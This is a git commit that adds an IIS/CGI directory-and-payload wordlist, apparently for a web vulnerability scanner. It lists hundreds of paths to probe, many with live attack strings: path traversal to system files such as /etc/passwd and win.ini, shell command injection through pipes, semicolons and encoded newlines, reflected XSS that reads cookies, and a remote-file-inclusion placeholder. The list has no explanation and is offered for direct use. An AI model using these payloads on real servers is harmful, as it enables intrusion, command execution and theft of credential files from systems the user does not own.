Add files via upload

2016-08-07 16:00:09 +08:00 · 2016-08-07 16:00:09 +08:00 · af88d04fb4
parent 2b180e8fe8
commit af88d04fb4
1 changed files with 642 additions and 0 deletions
--- a/payloads/directory/iis_cgi.txt
+++ b/payloads/directory/iis_cgi.txt
@ -0,0 +1,642 @@
+/.printer
+/%NETHOOD%/
+/<script>alert('XSS')</script>.aspx
+/AccessPlatform/
+/AccessPlatform/auth/
+/AccessPlatform/auth/clientscripts/cookies.js 
+/AccessPlatform/auth/clientscripts/login.js 
+/Exadmin/
+/ExchWeb/
+/Exchange/
+/Microsoft-Server-ActiveSync/
+/OMA/
+/OWA/
+/Public/
+/_layouts/alllibs.htm
+/_layouts/settings.htm
+/_layouts/userinfo.htm
+/_vti_bin/
+/_vti_bin/_vti_aut/fp30reg.dll
+/_vti_pvt/
+/_WEB_INF/
+/a%5c.aspx
+/adovbs.inc
+/aspnet_files/
+/certcontrol/
+/certenroll/
+/certsrv/
+/citrix/
+/citrix/AccessPlatform/auth/
+/citrix/AccessPlatform/auth/clientscripts/
+/AccessPlatform/auth/clientscripts/
+/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
+/Citrix/AccessPlatform/auth/clientscripts/login.js 
+/Citrix/PNAgent/config.xml
+/exchange/root.asp
+/forum.asp
+/forum_arc.asp
+/forum_professionnel.asp
+/iisadmin/
+/iisadmpwd/achg.htr
+/iisadmpwd/aexp.htr
+/iisadmpwd/aexp2.htr
+/iisadmpwd/aexp2b.htr
+/iisadmpwd/aexp3.htr
+/iisadmpwd/aexp4.htr
+/iisadmpwd/aexp4b.htr
+/iisadmpwd/anot.htr
+/iisadmpwd/anot3.htr
+/iiasdmpwd/
+/iishelp/
+/iishelp/iis/misc/default.asp
+/iissamples/
+/imprimer.asp
+/includes/adovbs.inc
+/msadc/
+/null.htw
+/pbserver/pbserver.dll
+/postinfo.html
+/rubrique.asp
+/scripts/
+/scripts/fpcount.exe
+/scripts/cgimail.exe
+/scripts/tools/newdsn.exe
+/scripts/tools/getdrvs.exe
+/scripts/convert.bas
+/cgi-bin/htmlscript
+/scripts/counter.exe
+/scripts/no-such-file.pl
+/share/
+/tsweb/
+/~/<script>alert('XSS')</script>.asp
+/~/<script>alert('XSS')</script>.aspx
+/index.shtml
+/x.htw
+/x.ida
+/x.idq
+/cgi
+/scripts/iisadmin/ism.dll?http/dir
+/scripts/samples/search/webhits.exe
+%2e%2e/abyss.conf
+.access
+.cobalt
+.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
+.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
+.fhp
+.htaccess
+.htaccess.old
+.htaccess.save
+.htaccess~
+.htpasswd
+.nsconfig
+.passwd
+.www_acl
+.wwwacl
+/_vti_pvt/doctodep.btr
+14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
+14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
+AT-admin.cgi
+AT-generate.cgi
+Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+AnyBoard.cgi
+AnyForm
+AnyForm2
+Backup/add-passwd.cgi
+C
+Count.cgi
+DC
+DCFORM
+File
+FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
+FormMail.cgi?<script>alert(\
+FormMail.pl
+ImageFolio/admin/admin.cgi
+LWGate
+LWGate.cgi
+Upload.pl
+Vs
+W
+YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00
+YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
+a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
+a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
+a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}
+a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}
+add_ftp.cgi
+addbanner.cgi
+adduser.cgi
+admin.cgi
+admin.cgi?list=../../../../../../../../../..{KNOWNFILE}
+admin.php
+admin.php3
+admin.pl
+adminhot.cgi
+adminwww.cgi
+af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+aglimpse
+aglimpse.cgi
+alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+amadmin.pl
+anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}
+ans.pl?p=../../../../../usr/bin/id|&blah
+ans/ans.pl?p=../../../../../usr/bin/id|&blah
+anyboard.cgi
+archie
+architext_query.cgi
+architext_query.pl
+ash
+astrocam.cgi
+atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
+auction/auction.cgi?action=
+auctiondeluxe/auction.pl
+auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}
+auth_data/auth_user_file.txt
+awl/auctionweaver.pl
+awstats.pl
+awstats/awstats.pl
+ax-admin.cgi
+ax.cgi
+axs.cgi
+badmin.cgi
+banner.cgi
+bannereditor.cgi
+bash
+bb-hist?HI
+bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbs_forum.cgi
+betsie/parserl.pl/<script>alert('XSS')</script>;
+bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=
+bizdb1-search.cgi
+blog/
+blog/mt-check.cgi
+blog/mt-load.cgi
+blog/mt.cfg
+bnbform
+bnbform.cgi
+book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10
+boozt/admin/index.cgi?section=5&input=1
+bsguest.cgi?email=x;ls
+bslist.cgi?email=x;ls
+build.cgi
+bulk/bulk.cgi
+c_download.cgi
+cached_feed.cgi
+cachemgr.cgi
+cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00
+calendar
+calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+calendar.pl
+calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|
+calendar/index.cgi
+calendar_admin.pl?config=|cat%20{KNOWNFILE}|
+calender_admin.pl
+campas?%0acat%0a{KNOWNFILE}%0a
+cart.pl
+cart.pl?db='
+cartmanager.cgi
+cbmc/forums.cgi
+ccbill-local.cgi?cmd=MENU
+ccbill-local.pl?cmd=MENU
+cgforum.cgi
+cgi-lib.pl
+cgicso?query=<script>alert('XSS')</script>
+cgicso?query=AAA
+cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00
+cgiwrap
+cgiwrap/%3Cfont%20color=red%3E
+cgiwrap/~@U
+cgiwrap/~JUNK(5)
+cgiwrap/~root
+change-your-password.pl
+classified.cgi
+classifieds
+classifieds.cgi
+classifieds/classifieds.cgi
+classifieds/index.cgi
+clickcount.pl?view=test
+clickresponder.pl
+code.php
+code.php3
+com5..........................................................................................................................................................................................................................box
+com5.java
+com5.pl
+commandit.cgi
+commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html
+common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}
+common/listrec.pl
+common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
+compatible.cgi
+count.cgi
+counter-ord
+counterbanner
+counterbanner-ord
+counterfiglet-ord
+counterfiglet/nc/
+cs
+csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
+csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
+csLive
+csNews.cgi
+csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
+csPassword.cgi
+csPassword/csPassword.cgi
+csh
+cstat.pl
+cutecast/members/
+cvsblame.cgi?file=<script>alert('XSS')</script>
+cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
+cvslog.cgi?file=<script>alert('XSS')</script>
+cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
+dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
+dasp/fm_shell.asp
+data/fetch.php?page=
+date
+day5datacopier.cgi
+day5datanotifier.cgi
+db2www/library/document.d2w/show
+db4web_c/dbdirname/{KNOWNFILE}
+db_manager.cgi
+dbman/db.cgi?db=no-db
+dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00
+dcshop/auth_data/auth_user_file.txt
+dcshop/orders/orders.txt
+dfire.cgi
+diagnose.cgi
+dig.cgi
+directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00
+displayTC.pl
+dnewsweb
+donothing
+dose.pl?daily&somefile.txt&|ls|
+download.cgi
+dumpenv.pl
+edit.pl
+empower?DB=whateverwhatever
+emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+enter.cgi
+environ.cgi
+environ.pl
+environ.pl?param1=<script>alert(document.cookie)</script>
+erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
+eshop.pl/seite=;cat%20eshop.pl|
+ex-logger.pl
+excite
+excite;IF
+ezadmin.cgi
+ezboard.cgi
+ezman.cgi
+ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|
+ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1
+ezshopper2/loadpage.cgi
+ezshopper3/loadpage.cgi
+faqmanager.cgi?toc={KNOWNFILE}%00
+faxsurvey?cat%20{KNOWNFILE}
+filemail
+filemail.pl
+finger
+finger.pl
+flexform
+flexform.cgi
+fom.cgi?file=<script>alert('XSS')</script>
+fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
+formmail
+formmail.cgi
+formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
+formmail.pl
+formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
+formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
+fortune
+ftp.pl
+ftpsh
+gH.cgi
+gbadmin.cgi?action=change_adminpass
+gbadmin.cgi?action=change_automail
+gbadmin.cgi?action=colors
+gbadmin.cgi?action=setup
+gbook/gbook.cgi?_MAILTO=xx;ls
+gbpass.pl
+generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1
+getdoc.cgi
+gettransbitmap
+glimpse
+gm-authors.cgi
+gm-cplog.cgi
+gm.cgi
+guestbook.cgi
+guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|
+guestbook.pl
+guestbook/passwd
+handler.cgi
+hitview.cgi
+horde/test.php
+horde/test.php?mode=phpinfo
+hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00
+htgrep?file=index.html&hdr={KNOWNFILE}
+html2chtml.cgi
+html2wml.cgi
+htmlscript?../../../../../../../../../..{KNOWNFILE}
+htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
+htsearch?-c/nonexistant
+htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+htsearch?exclude=%60{KNOWNFILE}%60
+ibill.pm
+icat
+if/admin/nph-build.cgi
+ikonboard/help.cgi?
+imageFolio.cgi
+imagefolio/admin/admin.cgi
+imagemap
+include/new-visitor.inc.php
+index.js0x70
+index.pl
+info2www
+info2www '(../../../../../../../bin/mail root <{KNOWNFILE}>
+infosrch.cgi
+ion-p?page=../../../../..{KNOWNFILE}
+jailshell
+jj
+journal.cgi?folder=journal.cgi%00
+ksh
+lastlines.cgi?process
+listrec.pl
+loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}
+loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+log-reader.cgi
+log/
+log/nether-log.pl?checkit
+login.cgi
+login.pl
+login.pl?course_id=\
+logit.cgi
+logs.pl
+logs/
+logs/access_log
+logs/error_log
+lookwho.cgi
+ls
+lwgate
+lwgate.cgi
+magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..{KNOWNFILE}
+mail
+mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00
+mailit.pl
+maillist.cgi
+maillist.pl
+mailnews.cgi
+main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}
+majordomo.pl
+man2html
+mastergate/search.cgi?search=0&search_on=all
+meta.pl
+mgrqcgi
+mini_logger.cgi
+mmstdod.cgi
+moin.cgi?test
+mojo/mojo.cgi
+mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}
+mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}
+mrtg.cgi?cfg=blah
+ms_proxy_auth_query/
+mt-static/
+mt-static/mt-check.cgi
+mt-static/mt-load.cgi
+mt-static/mt.cfg
+mt/
+mt/mt-check.cgi
+mt/mt-load.cgi
+mt/mt.cfg
+multihtml.pl?multi={KNOWNFILE}%00html
+musicqueue.cgi
+myguestbook.cgi?action=view
+namazu.cgi
+nbmember.cgi?cmd=list_all_users
+netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}
+netpad.cgi
+newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}
+nimages.php
+nlog-smb.cgi
+nlog-smb.pl
+non-existent.pl
+noshell
+nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+nph-error.pl
+nph-exploitscanget.cgi
+nph-maillist.pl
+nph-publish
+nph-publish.cgi
+nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-test-cgi
+ntitar.pl
+opendir.php?{KNOWNFILE}
+orders/orders.txt
+pagelog.cgi
+pals-cgi?palsAction=restart&documentName={KNOWNFILE}
+parse-file
+pass
+passwd
+passwd.txt
+password
+pbcgi.cgi?name=Joe%Camel&email=%3C
+perl
+perl?-v
+perlshop.cgi
+pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
+pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}
+pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
+phf
+phf.cgi?QALIA
+phf?Qname=root%0Acat%20{KNOWNFILE}%20
+photo/
+photo/manage.cgi
+photo/protected/manage.cgi
+php-cgi
+php.cgi?{KNOWNFILE}
+plusmail
+pollit/Poll_It_
+pollssi.cgi
+post-query
+post_query
+postcards.cgi
+powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
+printenv
+printenv.tmp
+probecontrol.cgi?command=enable&username=cancer&password=killer
+processit.pl
+profile.cgi
+pu3.pl
+publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10
+query
+query?mss=%2e%2e/config
+quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=
+quikstore.cfg
+quizme.cgi
+r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
+ratlog.cgi
+redirect
+register.cgi
+replicator/webpage.cgi/
+responder.cgi
+retrieve_password.pl
+rksh
+rmp_query
+robadmin.cgi
+robpoll.cgi
+rpm_query
+rsh
+rtm.log
+rwcgi60
+rwcgi60/showenv
+rwwwshell.pl
+sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1
+sawmill?rfcf+%22
+sbcgi/sitebuilder.cgi
+scoadminreg.cgi
+scripts/*%0a.pl
+search.cgi
+search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+search.php?searchstring=<script>alert(document.cookie)</script>
+search.pl
+search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
+search.pl?form=../../../../../../../../../..{KNOWNFILE}%00
+search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+sendform.cgi
+sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
+sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}
+session/adminlogin
+sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}
+sh
+shop.cgi?page=../../../../../../..{KNOWNFILE}
+shop.pl/page=;cat%20shop.pl|
+shop/auth_data/auth_user_file.txt
+shop/orders/orders.txt
+shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}
+shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|
+show.pl
+showcheckins.cgi?person=<script>alert('XSS')</script>
+showuser.cgi
+simple/view_page?mv_arg=|cat%20{KNOWNFILE}|
+simplestguest.cgi
+simplestmail.cgi
+smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
+smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
+sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+spin_client.cgi?aaaaaaaa
+ss
+sscd_suncourier.pl
+ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}
+start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
+stat.pl
+stat/
+stats-bin-p/reports/index.html
+stats.pl
+stats.prf
+stats/
+stats/statsbrowse.asp?filepath=c:\&Opt=3
+stats_old/
+statsconfig
+statusconfig.pl
+statview.pl
+store.cgi?
+store/agora.cgi?cart_id=<script>alert('XSS')</script>
+store/agora.cgi?page=whatever33.html
+store/index.cgi?page=../../../../../../../..{KNOWNFILE}
+story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
+story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
+survey
+survey.cgi
+sws/admin.html
+sws/manager.pl
+tablebuild.pl
+talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1
+tcsh
+technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}
+test-cgi.tcl
+test-cgi?/*
+test-env
+test.cgi
+test/test.cgi
+texis/junk
+texis/phine
+textcounter.pl
+tidfinder.cgi
+tigvote.cgi
+title.cgi
+tpgnrock
+traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}
+troops.cgi
+ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}
+ultraboard.cgi
+ultraboard.pl
+unlg1.1
+unlg1.2
+update.dpgs
+upload.cgi
+uptime
+urlcount.cgi?%3CIMG%20
+ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}
+utm/admin
+utm/utm_stat
+view-source
+view-source?view-source
+view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00
+viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
+viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
+viewlogs.pl
+viewsource?{KNOWNFILE}
+viralator.cgi
+virgil.cgi
+vote.cgi
+vpasswd.cgi
+vq/demos/respond.pl?<script>alert('XSS')</script>
+w3-msql
+w3-sql
+wais.pl
+way-board.cgi?db={KNOWNFILE}%00
+way-board/way-board.cgi?db={KNOWNFILE}%00
+webais
+webbbs.cgi
+webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}
+webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
+webdist.cgi?distloc=;cat%20{KNOWNFILE}
+webdriver
+webgais
+webif.cgi
+webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
+webmap.cgi
+webnews.pl
+webplus?about
+webplus?script=../../../../../../../../../..{KNOWNFILE}
+websendmail
+webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}
+webutil.pl
+webutils.pl
+webwho.pl
+where.pl?sd=ls%20/etc
+whois.cgi?action=load&whois=%3Bid
+whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
+whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
+whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}
+windmail
+wrap
+wrap.cgi
+ws_ftp.ini
+www-sql
+wwwadmin.pl
+wwwboard.cgi.cgi
+wwwboard.pl
+wwwstats.pl
+wwwthreads/3tvars.pm
+wwwthreads/w3tvars.pm
+wwwwais
+zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00
+zsh